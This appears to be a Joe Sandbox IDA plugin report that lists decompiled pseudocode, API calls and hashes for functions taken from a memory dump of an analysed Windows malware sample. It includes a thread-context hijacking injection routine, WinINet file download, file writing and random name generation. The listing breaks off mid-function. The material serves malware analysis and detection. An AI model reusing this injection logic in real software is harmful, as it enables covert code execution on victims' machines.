Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: BitsDeleteObject$CreateSection
String ID:
API String ID: 1423349713-0
Opcode ID: 347b63763d38e90d18e23735c714ccb24b6a14438be2c50dda95f2350a080473
Instruction ID: fa39154986b0490241528a8b29342915be63f7bf14dec5d0a3d8605118f382b6
Opcode Fuzzy Hash: 347b63763d38e90d18e23735c714ccb24b6a14438be2c50dda95f2350a080473
Instruction Fuzzy Hash: 9431D4B210120BAFDB209F16CD809AB7BE9EF04344B04493FF985E66A0D779DD619B54

Uniqueness

Uniqueness Score: -1.00%

Function 0040F570 Relevance: 7.6, APIs: 5, Instructions: 94
networkCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040F570(intOrPtr* __edi, void* __eflags, intOrPtr _a4, void* _a8, intOrPtr* _a12) {
				intOrPtr _v28;
				signed int _v44;
				char _v52;
				intOrPtr _v56;
				char _v61;
				intOrPtr _v64;
				signed int _v72;
				intOrPtr _v76;
				char _v77;
				intOrPtr _v84;
				intOrPtr _v85;
				char _v89;
				void* __esi;
				char _t31;
				intOrPtr _t32;
				char* _t37;
				intOrPtr _t44;
				intOrPtr* _t58;
				intOrPtr _t62;
				intOrPtr* _t63;
				intOrPtr _t65;

				_t63 = __edi;
				ResetEvent(_a8);
				_t31 = E0040865F(0x1000);
				_t65 = 0;
				_v52 = _t31;
				if(_t31 != 0) {
					_t58 = __imp__InternetSetStatusCallbackW;
					_t32 =  *_t58(_a4, E0040F527);
					_t62 = 0x28;
					_v56 = _t32;
					 *_a12 = 0;
					 *__edi = 0;
					_v61 = 1;
					E00408742( &_v52,  &_v52, 0, _t62);
					_v64 = _t62;
					_v44 = _v72;
					while(1) {
						L3:
						_t37 =  &_v52;
						_v28 = 0x1000;
						__imp__InternetReadFileExA(_a4, _t37, 8, _t65);
						if(_t37 == 0) {
							break;
						}
						if(_v44 != _t65) {
							_t67 = _a12;
							if(E0040861A( *_t63 + _v44, _a12) == 0) {
								L9:
								_v77 = 0;
							} else {
								E004086CB( *_t67 +  *_t63, _v76, _v44);
								 *_t63 =  *_t63 + _v56;
								_t65 = 0;
								continue;
							}
						}
						L10:
						asm("sbb eax, eax");
						 *_t58(_a4,  ~(_v72 + 1) & _v72);
						E0040868F(_v84);
						if(_v89 == 0) {
							E0040868F( *_a12);
						}
						_t44 = _v85;
						goto L13;
					}
					if(GetLastError() != 0x3e5) {
						goto L9;
					} else {
						E0040BDF5( &_a8);
						goto L3;
					}
					goto L10;
				} else {
					E0040868F(0);
					_t44 = 0;
				}
				L13:
				return _t44;
			}

0x0040f570
0x0040f57e
0x0040f589
0x0040f58e
0x0040f590
0x0040f596
0x0040f5a5
0x0040f5b3
0x0040f5b7
0x0040f5b8
0x0040f5c0
0x0040f5c8
0x0040f5ca
0x0040f5cf
0x0040f5d8
0x0040f5dc
0x0040f5e0
0x0040f5e0
0x0040f5e3
0x0040f5eb
0x0040f5f3
0x0040f5fb
0x00000000
0x00000000
0x0040f619
0x0040f621
0x0040f62b
0x0040f64b
0x0040f64b
0x0040f62d
0x0040f63c
0x0040f645
0x0040f647
0x00000000
0x0040f647
0x0040f62b
0x0040f650
0x0040f657
0x0040f661
0x0040f667
0x0040f671
0x0040f678
0x0040f678
0x0040f67d
0x00000000
0x0040f67d
0x0040f608
0x00000000
0x0040f60a
0x0040f60e
0x00000000
0x0040f60e
0x00000000
0x0040f598
0x0040f599
0x0040f59e
0x0040f59e
0x0040f681
0x0040f686

APIs

ResetEvent.KERNEL32(?), ref: 0040F57E
InternetSetStatusCallbackW.WININET(?,0040F527), ref: 0040F5B3
InternetReadFileExA.WININET ref: 0040F5F3
GetLastError.KERNEL32 ref: 0040F5FD
InternetSetStatusCallbackW.WININET(?,?), ref: 0040F661

Part of subcall function 0040868F: HeapFree.KERNEL32(00000000,00000000,0040D109,00000000,?,?), ref: 004086A2

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Internet$CallbackStatus$ErrorEventFileFreeHeapLastReadReset
String ID:
API String ID: 4044253124-0
Opcode ID: fdc4d42a65bda28ff11af46cdacb1d0c3414c485a7e03397b53e2e0371c875c4
Instruction ID: 26ea894790d6b61d9a53a0496b1e458c582967402b2be26d0a902d70999d22ad
Opcode Fuzzy Hash: fdc4d42a65bda28ff11af46cdacb1d0c3414c485a7e03397b53e2e0371c875c4
Instruction Fuzzy Hash: FF318F31108345AFCB11DF64CD40A6ABBE8FF58744F04493EF884A72A1DB79D915CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004057F1 Relevance: 7.6, APIs: 5, Instructions: 85
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004057F1(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				long _v12;
				void* _v16;
				char _v32;
				void _v360;
				short _v880;
				void* __edi;
				void* __esi;
				void* _t18;
				void* _t25;
				void* _t26;
				long _t39;
				void* _t42;
				void* _t44;
				long _t47;

				_t48 =  &_v32;
				_t18 = 0xe;
				_v16 = __edx;
				_t44 = __ecx;
				E00412F05(_t18,  &_v32);
				if(E0040DFC5(_t48,  &_v880, _t44) == 0) {
					L11:
					return 1;
				}
				_t25 = CreateFileW( &_v880, 0x40000000, 1, 0, 2, 0x80, 0);
				_v8 = _t25;
				if(_t25 == 0xffffffff) {
					goto L11;
				}
				_t26 = 0x13;
				_t39 = 0;
				E00412ECF(_t26,  &_v360);
				if(WriteFile(_v8,  &_v360, 0x146,  &_v12, 0) == 0 || _v12 != 0x146) {
					L9:
					FlushFileBuffers(_v8);
					CloseHandle(_v8);
					if(_t39 == 0) {
						E0040DA97( &_v880);
					}
					goto L11;
				} else {
					_t42 = _v16;
					if(_t42 == 0) {
						L7:
						_t39 = 1;
						goto L9;
					}
					_t47 = E004092EF(_t42);
					if(WriteFile(_v8, _t42, _t47,  &_v12, 0) == 0 || _v12 != _t47) {
						_t39 = 0;
						goto L9;
					} else {
						goto L7;
					}
				}
			}

0x004057fe
0x00405801
0x00405802
0x00405805
0x00405807
0x0040581d
0x004058d3
0x004058d7
0x004058d7
0x0040583c
0x00405842
0x00405848
0x00000000
0x00000000
0x00405857
0x00405858
0x0040585a
0x0040587e
0x004058af
0x004058b2
0x004058bb
0x004058c4
0x004058cd
0x004058cd
0x00000000
0x00405885
0x00405885
0x0040588a
0x004058a9
0x004058a9
0x00000000
0x004058a9
0x00405893
0x004058a2
0x004058ad
0x00000000
0x00000000
0x00000000
0x00000000
0x004058a2

APIs

Part of subcall function 0040DFC5: PathCombineW.SHLWAPI(?,?,?,0041A149,?,004218C8,00000000,00000032,?), ref: 0040DFE5

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 0040583C
WriteFile.KERNEL32(?,?,00000146,?,00000000,00000000), ref: 0040587A
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040589E
FlushFileBuffers.KERNEL32(?), ref: 004058B2
CloseHandle.KERNEL32(?), ref: 004058BB

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: File$Write$BuffersCloseCombineCreateFlushHandlePath
String ID:
API String ID: 2459967240-0
Opcode ID: c66051ac2dee0966eb4a1036ddbd73fbbcc59d046a55d27250554c881efcabc2
Instruction ID: 047ed86a7f92bc3623d088014bfa3a0458b504a2eeae1d70223edfcafc586366
Opcode Fuzzy Hash: c66051ac2dee0966eb4a1036ddbd73fbbcc59d046a55d27250554c881efcabc2
Instruction Fuzzy Hash: 60219C32901218BBDF20AAA18D05BDF7BBCEF40750F1080A7A901F2190D7799A55CF68

Uniqueness

Uniqueness Score: -1.00%

Function 004083E9 Relevance: 7.6, APIs: 5, Instructions: 83
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E004083E9(void* __edx, void** _a4, void** _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32, intOrPtr _a36, intOrPtr _a40, void* _a44) {
				struct _CONTEXT _v720;
				void* __edi;
				void* __esi;
				intOrPtr _t32;
				void* _t36;
				void* _t37;
				void** _t45;
				void* _t46;
				void* _t47;
				void** _t50;
				void* _t52;
				void* _t53;
				signed int _t55;

				_t47 = __edx;
				_t45 = _a4;
				_t32 =  *0x42188c(_t45, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44);
				_a40 = _t32;
				if(_t32 >= 0 && (_a32 & 0x00000001) != 0 && _t45 != 0 && _a8 != 0 && E00419F02() != 0 && GetProcessId( *_t45) != 0) {
					_t36 = E00419D38(_t46, _t47, _t35);
					_a44 = _t36;
					_t63 = _t36;
					if(_t36 != 0) {
						_push(_t52);
						_t37 = E00419E13(_t46,  *_t45, _t52, _t63, _t36, 0);
						_t50 = _a8;
						_t53 = _t37;
						_a32 = _t53;
						_t55 = _t53 -  *0x42187c + E0041A5AD;
						_v720.ContextFlags = 0x10003;
						if(GetThreadContext( *_t50,  &_v720) == 0 || _v720.Eip !=  *0x421894) {
							L12:
							VirtualFreeEx( *_t45, _a32, 0, 0x8000);
						} else {
							if(( *0x421868 & 0x00000010) != 0) {
								_t55 = _t55 ^ _v720.Eax;
							}
							_v720.Eax = _t55;
							_v720.ContextFlags = 0x10002;
							if(SetThreadContext( *_t50,  &_v720) == 0) {
								goto L12;
							}
						}
						CloseHandle(_a44);
					}
				}
				return _a40;
			}

0x004083e9
0x004083f6
0x00408415
0x0040841b
0x00408420
0x00408460
0x00408465
0x00408468
0x0040846a
0x00408470
0x00408477
0x0040847c
0x0040847f
0x00408487
0x00408493
0x00408499
0x004084ab
0x004084ed
0x004084f9
0x004084bb
0x004084c2
0x004084c4
0x004084c4
0x004084d3
0x004084d9
0x004084eb
0x00000000
0x00000000
0x004084eb
0x00408502
0x00408509
0x0040846a
0x0040850f

APIs

Part of subcall function 00419F02: WaitForSingleObject.KERNEL32(00000000,0040506D,00405103,00000000), ref: 00419F0A

GetProcessId.KERNEL32(?), ref: 00408451

Part of subcall function 00419D38: CreateMutexW.KERNEL32(004218A0,00000001,00000000,00421AE0,?,?,00000002,?), ref: 00419D87

GetThreadContext.KERNEL32(00000000,?,00000000,00000000,?,?,00000000), ref: 004084A3
SetThreadContext.KERNEL32(00000000,00010003,?,?,00000000), ref: 004084E3
VirtualFreeEx.KERNEL32(?,00000001,00000000,00008000,?,?,00000000), ref: 004084F9
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00408502

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: ContextThread$CloseCreateFreeHandleMutexObjectProcessSingleVirtualWait
String ID:
API String ID: 1556854628-0
Opcode ID: 4c54991b401e52872e8c40fdb96df062cffdfac3ff787602e48e731c235c9097
Instruction ID: 7210a5de11b012a5f9a775f02b9dd4d4c8bb112852a5e4634a03a5bb83fb5910
Opcode Fuzzy Hash: 4c54991b401e52872e8c40fdb96df062cffdfac3ff787602e48e731c235c9097
Instruction Fuzzy Hash: F1316D3150021AEBDF229F65CE48BDA3BB9BF18344F0441AAFD48B22A0DB75D850CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041693C Relevance: 7.6, APIs: 5, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041693C(struct HWND__* __ecx, intOrPtr* __edx) {
				struct tagRECT _v24;
				char _v28;
				struct HWND__* _v32;
				intOrPtr _v36;
				struct HWND__* _v40;
				void* __edi;
				intOrPtr _t29;
				signed int _t30;
				RECT* _t52;
				signed int _t54;
				intOrPtr* _t61;

				_t55 = __edx;
				_t61 = __edx;
				 *( *(__edx + 0x14)) = 0x3c;
				_v32 = __ecx;
				if(GetWindowInfo(__ecx,  *(__edx + 0x14)) == 0) {
					L12:
					return 1;
				}
				_t29 =  *((intOrPtr*)(_t61 + 0x14));
				_t54 =  *(_t29 + 0x24);
				if((_t54 & 0x40000000) == 0) {
					_t52 =  *_t61 + 0x24;
				} else {
					_t52 = _t61 + 4;
				}
				if((_t54 & 0x10000000) == 0) {
					_t30 = 0;
					goto L9;
				} else {
					if((IntersectRect( &_v24, _t29 + 0x14, _t52) & 0xffffff00 | _t40 != 0x00000000) != 0) {
						L10:
						E00416806( *_t61, _t54, _t55, _t52, _v32,  *((intOrPtr*)(_t61 + 0x14)));
						_v36 =  *_t61;
						_v24.right =  *((intOrPtr*)(_t61 + 0x14));
						if(GetTopWindow(_v40) != 0) {
							E0040CDD8( &_v28, _t35);
						}
						goto L12;
					}
					if(IsRectEmpty( *((intOrPtr*)(_t61 + 0x14)) + 0x14) == 0) {
						goto L12;
					}
					_t30 = IntersectRect( &_v24,  *((intOrPtr*)(_t61 + 0x14)) + 4, _t52) & 0xffffff00 | _t48 != 0x00000000;
					L9:
					if(_t30 == 0) {
						goto L12;
					}
					goto L10;
				}
			}

0x0041693c
0x00416947
0x0041694d
0x00416956
0x00416963
0x00416a07
0x00416a0f
0x00416a0f
0x00416969
0x0041696c
0x00416975
0x0041697e
0x00416977
0x00416977
0x00416977
0x00416987
0x004169cb
0x00000000
0x00416989
0x004169a2
0x004169d1
0x004169dc
0x004169e7
0x004169ee
0x004169fa
0x00416a02
0x00416a02
0x00000000
0x004169fa
0x004169b3
0x00000000
0x00000000
0x004169c6
0x004169cd
0x004169cf
0x00000000
0x00000000
0x00000000
0x004169cf

APIs

GetWindowInfo.USER32 ref: 0041695B
IntersectRect.USER32 ref: 00416999
IsRectEmpty.USER32 ref: 004169AB
IntersectRect.USER32 ref: 004169C2
GetTopWindow.USER32(?), ref: 004169F2

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Rect$IntersectWindow$EmptyInfo
String ID:
API String ID: 1664082778-0
Opcode ID: 54577643578bfa0ffc80bd88542a434e988151d6d7d07d99183fc75bff988dc9
Instruction ID: a45d565be9b6e6fe27ecd06b810b56631458e6d9f5213695ee6375b67a2d9389
Opcode Fuzzy Hash: 54577643578bfa0ffc80bd88542a434e988151d6d7d07d99183fc75bff988dc9
Instruction Fuzzy Hash: 34217FB21003019BD720DF68DD84EA7B7ECAF44754F050A2AF882E3651DB39E849CB75

Uniqueness

Uniqueness Score: -1.00%

Function 004053AC Relevance: 7.6, APIs: 5, Instructions: 71
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004053AC(void* __ecx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v104;
				char _v204;
				char _v724;
				void* __edi;
				void* __esi;
				intOrPtr _t18;
				void* _t24;
				long _t28;
				long _t35;
				void* _t40;
				WCHAR* _t43;
				void* _t50;

				_t50 = __eflags;
				_t40 = __ecx;
				SetThreadPriority(GetCurrentThread(), 0);
				_t18 = E00419DD8(_t40, _t50, 0x19367401, 1);
				_v12 = _t18;
				if(_t18 != 0) {
					E00419DA0(0xff220823,  &_v204, 0);
					_t43 =  &_v724;
					E0041A0E0(_t40, _t43, 1);
					PathQuoteSpacesW(_t43);
					_t41 = _t43;
					_v8 = E00409301(_t43);
					_t24 = E00419F02();
					__eflags = _t24;
					if(_t24 == 0) {
						L7:
						E0040BE5B(_v12);
						__eflags = 0;
						return 0;
					}
					E00412F05(0xa6,  &_v104);
					_t28 = WaitForSingleObject( *0x421d2c, 0xc8);
					__eflags = _t28 - 0x102;
					if(_t28 != 0x102) {
						L6:
						goto L7;
					}
					_v8 = _v8 + _v8 + 2;
					do {
						E0040C93C(_t41,  &_v104,  &_v204, 1,  &_v724, _v8);
						_t35 = WaitForSingleObject( *0x421d2c, 0xc8);
						__eflags = _t35 - 0x102;
					} while (_t35 == 0x102);
					goto L6;
				}
				return _t18 + 1;
			}

0x004053ac
0x004053ac
0x004053be
0x004053cb
0x004053d0
0x004053d5
0x004053ec
0x004053f3
0x004053f9
0x00405401
0x00405407
0x0040540e
0x00405411
0x00405416
0x00405418
0x00405479
0x0040547c
0x00405481
0x00000000
0x00405483
0x00405424
0x0040543b
0x00405440
0x00405442
0x00405477
0x00000000
0x00405478
0x0040544b
0x0040544e
0x00405465
0x00405471
0x00405473
0x00405473
0x00000000
0x0040544e
0x00000000

APIs

GetCurrentThread.KERNEL32 ref: 004053B7
SetThreadPriority.KERNEL32(00000000), ref: 004053BE

Part of subcall function 00419DD8: CreateMutexW.KERNEL32(004218A0,00000000,?,?,?,?), ref: 00419DF9

PathQuoteSpacesW.SHLWAPI(?,00000001,FF220823,?,00000000,?,19367401,00000001), ref: 00405401
WaitForSingleObject.KERNEL32(000000C8,?,?,?,19367401,00000001), ref: 0040543B
WaitForSingleObject.KERNEL32(000000C8,?,?,00000001,?,?,?,?,?,19367401,00000001), ref: 00405471

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: ObjectSingleThreadWait$CreateCurrentMutexPathPriorityQuoteSpaces
String ID:
API String ID: 123286213-0
Opcode ID: 1472bc8b3ddf91213a90b3758811db998dca58a6171b557f6a5919df1a94df86
Instruction ID: 179478cdde133813bd945cd12b98fe030fb97bc809b277513496743a2580aa9a
Opcode Fuzzy Hash: 1472bc8b3ddf91213a90b3758811db998dca58a6171b557f6a5919df1a94df86
Instruction Fuzzy Hash: E821A171A00208BEEB11ABA0DD45FEE77BDEB44308F504076F904F71A1DA759E858B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040BBAF Relevance: 7.6, APIs: 5, Instructions: 63networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00000002,00000000), ref: 0040BBC1
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 0040BBEB
WSAGetLastError.WS2_32 ref: 0040BBF2
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040BC1E

Part of subcall function 0040868F: HeapFree.KERNEL32(00000000,00000000,0040D109,00000000,?,?), ref: 004086A2

closesocket.WS2_32(?), ref: 0040BC32

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Ioctl$ErrorFreeHeapLastclosesocketsocket
String ID:
API String ID: 2355469559-0
Opcode ID: 4c97d68a7cbecac3472241bca75d75a8e40d7cea80eb85cf667a498ede7887f2
Instruction ID: 48b161d902518745e8a651cca0afb940e434eef3b93227d14b425634f534f629
Opcode Fuzzy Hash: 4c97d68a7cbecac3472241bca75d75a8e40d7cea80eb85cf667a498ede7887f2
Instruction Fuzzy Hash: 1F118CB1801128BADB10AF65DD48CEF7E3CEF453A4B100529F406F61A0DB348E40DAE8

Uniqueness

Uniqueness Score: -1.00%

Function 0041657B Relevance: 7.6, APIs: 5, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041657B(struct HWND__* _a4, struct tagRECT* _a8, int _a12) {
				int _t20;
				signed int _t21;
				struct HWND__* _t28;
				char* _t32;

				_t28 = _a4;
				if(( *0x421868 & 0x00000004) == 0 || E00419F02() == 0) {
					L9:
					return GetUpdateRect(_t28, _a8, _a12);
				} else {
					_t32 = TlsGetValue( *0x421eac);
					if(_t32 == 0 || _t28 !=  *((intOrPtr*)(_t32 + 4))) {
						goto L9;
					} else {
						if(_a8 != 0) {
							_t6 = _t32 + 0xc; // 0xc
							E004086CB( &_a8, _t6, 0x10);
						}
						if(_a12 != 0) {
							_t20 = SaveDC( *(_t32 + 8));
							_t21 = SendMessageW(_t28, 0x14,  *(_t32 + 8), 0);
							asm("sbb eax, eax");
							 *((intOrPtr*)(_t32 + 0x1c)) =  ~_t21 + 1;
							RestoreDC( *(_t32 + 8), _t20);
						}
						 *_t32 = 1;
						return 1;
					}
				}
			}

0x00416586
0x0041658a
0x004165fb
0x00000000
0x00416595
0x004165a1
0x004165a5
0x00000000
0x004165ac
0x004165b0
0x004165b4
0x004165bc
0x004165bc
0x004165c5
0x004165cb
0x004165db
0x004165e3
0x004165ea
0x004165ed
0x004165f3
0x004165f7
0x00000000
0x004165f7
0x004165a5

APIs

GetUpdateRect.USER32(?,?,?), ref: 00416602

Part of subcall function 00419F02: WaitForSingleObject.KERNEL32(00000000,0040506D,00405103,00000000), ref: 00419F0A

TlsGetValue.KERNEL32 ref: 0041659B
SaveDC.GDI32(?), ref: 004165CB
SendMessageW.USER32(?,00000014,?,00000000), ref: 004165DB
RestoreDC.GDI32(?,00000000), ref: 004165ED

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
String ID:
API String ID: 3142230470-0
Opcode ID: 2e506c66744799ccaa43e8e1937b1d6f35629c4de9ad55b48ef9763ba8854298
Instruction ID: 8a0375f896e700ed0098bfdb5af5d3cb9e2c1e98b8109fc92892cd0884b0cd68
Opcode Fuzzy Hash: 2e506c66744799ccaa43e8e1937b1d6f35629c4de9ad55b48ef9763ba8854298
Instruction Fuzzy Hash: 15117C31405349FFDB219F61ED48BEB7BA9EB04715F05883AF99692171C739D880CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00416770 Relevance: 7.5, APIs: 5, Instructions: 49
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00416770() {
				struct tagMSG _v32;
				int _t12;
				char _t17;
				void* _t22;

				SetThreadPriority(GetCurrentThread(), 1);
				SetEvent( *0x421eb4);
				while(1) {
					_t12 = GetMessageW( &_v32, 0xffffffff, 0, 0);
					if(_t12 == 0xffffffff) {
						break;
					}
					if(_t12 == 0) {
						break;
					}
					if(_v32.message ==  *0x421eb0 && _v32.wParam == 0xfffffffc) {
						_t17 = E00416025( *0x421eb8 + 0x114, _t19, _t22, 0x421ea8, _v32.lParam, 1);
						_t19 =  *0x421eb8;
						 *((char*)( *0x421eb8 + 0x124)) = _t17;
						SetEvent( *0x421eb4);
					}
				}
				return 0 | _t12 == 0x00000000;
			}

0x00416784
0x00416796
0x004167e5
0x004167f0
0x004167f5
0x00000000
0x00000000
0x004167a2
0x00000000
0x00000000
0x004167ae
0x004167cc
0x004167d1
0x004167d7
0x004167e3
0x004167e3
0x004167ae
0x00416805

APIs

GetCurrentThread.KERNEL32 ref: 0041677D
SetThreadPriority.KERNEL32(00000000), ref: 00416784
SetEvent.KERNEL32 ref: 00416796
SetEvent.KERNEL32 ref: 004167E3
GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 004167F0

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: EventThread$CurrentMessagePriority
String ID:
API String ID: 3943651903-0
Opcode ID: 8743f443dba6f3c19ef9d48bbacd8c56d5e0894bab93c5b8c1777239ee0faaf8
Instruction ID: ee8636e4a4ba2c79402dfca03e64357e788864129d5e2869279672356c290915
Opcode Fuzzy Hash: 8743f443dba6f3c19ef9d48bbacd8c56d5e0894bab93c5b8c1777239ee0faaf8
Instruction Fuzzy Hash: D901F53120020497CB209B68ED06FD67BA4AB94338F15033AF930D22F0D7B2D986CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040467E Relevance: 7.5, APIs: 5, Instructions: 32
synchronizationwindowCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040467E(void* __ebx, void* __esi, void* _a4) {
				void* _v0;
				void* _t24;
				void* _t28;

				_t28 = __esi;
				_t24 = __ebx;
				_push(0xffffffff);
				_push( *((intOrPtr*)(__esi + 0x14)));
			}

0x0040467e
0x0040467e
0x0040467f
0x00404681

APIs

WaitForSingleObject.KERNEL32(?,000000FF,7478A660,00404ABA,00000000), ref: 00404684
ReleaseMutex.KERNEL32(?), ref: 004046B8
IsWindow.USER32(?), ref: 004046BF
PostMessageW.USER32(?,00000215,00000000,?), ref: 004046D9
SendMessageW.USER32(?,00000215,00000000,?), ref: 004046E1

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Message$MutexObjectPostReleaseSendSingleWaitWindow
String ID:
API String ID: 794275546-0
Opcode ID: 4ae72efaf00dbae7b8c4267d28902ee7baa05560076d9a3139867150ae51e05d
Instruction ID: d4be97a7b4737830a7cbe33ffc96fa13544e900c8780465e824ac6eb5f31fbee
Opcode Fuzzy Hash: 4ae72efaf00dbae7b8c4267d28902ee7baa05560076d9a3139867150ae51e05d
Instruction Fuzzy Hash: B1F019782043009FC3209F25DD489AABBF4FB89711B044A7DF896A37B1D775A844CB29

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA55 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CA55(signed int __eax, signed int __ecx, void* __eflags, signed int _a4, signed short* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char* _v28;
				char* _v32;
				signed int _t56;
				WCHAR* _t57;
				short* _t59;
				signed short _t72;
				char* _t78;
				signed int _t85;
				signed short* _t86;
				signed int _t88;
				intOrPtr _t89;
				void* _t90;

				_t88 = E00409B07(__eax & 0x000000ff, __ecx & 0x000000ff);
				_v16 = _t88;
				_t56 = E00409ABB();
				_t78 = "bcdfghklmnpqrstvwxz";
				if((_t56 & 0x00000100) == 0) {
					_v32 = "aeiouy";
					_v28 = _t78;
				} else {
					_v32 = _t78;
					_v28 = "aeiouy";
				}
				_t85 = 0;
				_v12 = 0;
				_v8 = 0;
				if(_t88 > 0) {
					_v20 = _a4 & 0x00000004;
					do {
						if(_v8 == 2) {
							if((E00409ABB() & 0x00000100) == 0) {
								_v32 = "aeiouy";
								_v28 = _t78;
							} else {
								_v32 = _t78;
								_v28 = "aeiouy";
							}
							_v8 = _v8 & 0x00000000;
						}
						_t89 =  *((intOrPtr*)(_t90 + _v8 * 4 - 0x1c));
						_v24 = ((0 | _t89 != _t78) - 0x00000001 & 0x0000000d) + 6;
						if(_v20 == 0 || _t85 - _v12 <= 1 || (E00409ABB() & 0x00000101) != 0x101) {
							_t72 =  *((char*)(E00409B07(_v24 - 1, 0) + _t89));
						} else {
							_t72 = 0x20;
							_v12 = _t85;
						}
						_a8[_t85] = _t72;
						_t85 = _t85 + 1;
						_v8 = _v8 + 1;
					} while (_t85 < _v16);
					_t88 = _v16;
				}
				if((_a4 & 0x00000004) == 0 || _t88 <= 0) {
					_t86 = _a8;
				} else {
					_t86 = _a8;
					_t59 = _t86 + _t88 * 2 - 2;
					while( *_t59 == 0x20) {
						_t88 = _t88 - 1;
						_t59 = _t59;
						if(_t88 > 0) {
							continue;
						} else {
						}
						goto L24;
					}
				}
				L24:
				_t57 = 0;
				_t86[_t88] = 0;
				if((_a4 & 0x00000002) != 0) {
					_t57 = CharUpperW( *_t86 & 0x0000ffff);
					 *_t86 = 0;
				}
				return _t57;
			}

0x0040ca6a
0x0040ca6c
0x0040ca6f
0x0040ca74
0x0040ca7e
0x0040ca8c
0x0040ca93
0x0040ca80
0x0040ca80
0x0040ca83
0x0040ca83
0x0040ca96
0x0040ca98
0x0040ca9b
0x0040caa0
0x0040caac
0x0040caaf
0x0040cab3
0x0040cabf
0x0040cacd
0x0040cad4
0x0040cac1
0x0040cac1
0x0040cac4
0x0040cac4
0x0040cad7
0x0040cad7
0x0040cade
0x0040caf4
0x0040caf7
0x0040cb28
0x0040cb15
0x0040cb17
0x0040cb18
0x0040cb18
0x0040cb30
0x0040cb34
0x0040cb35
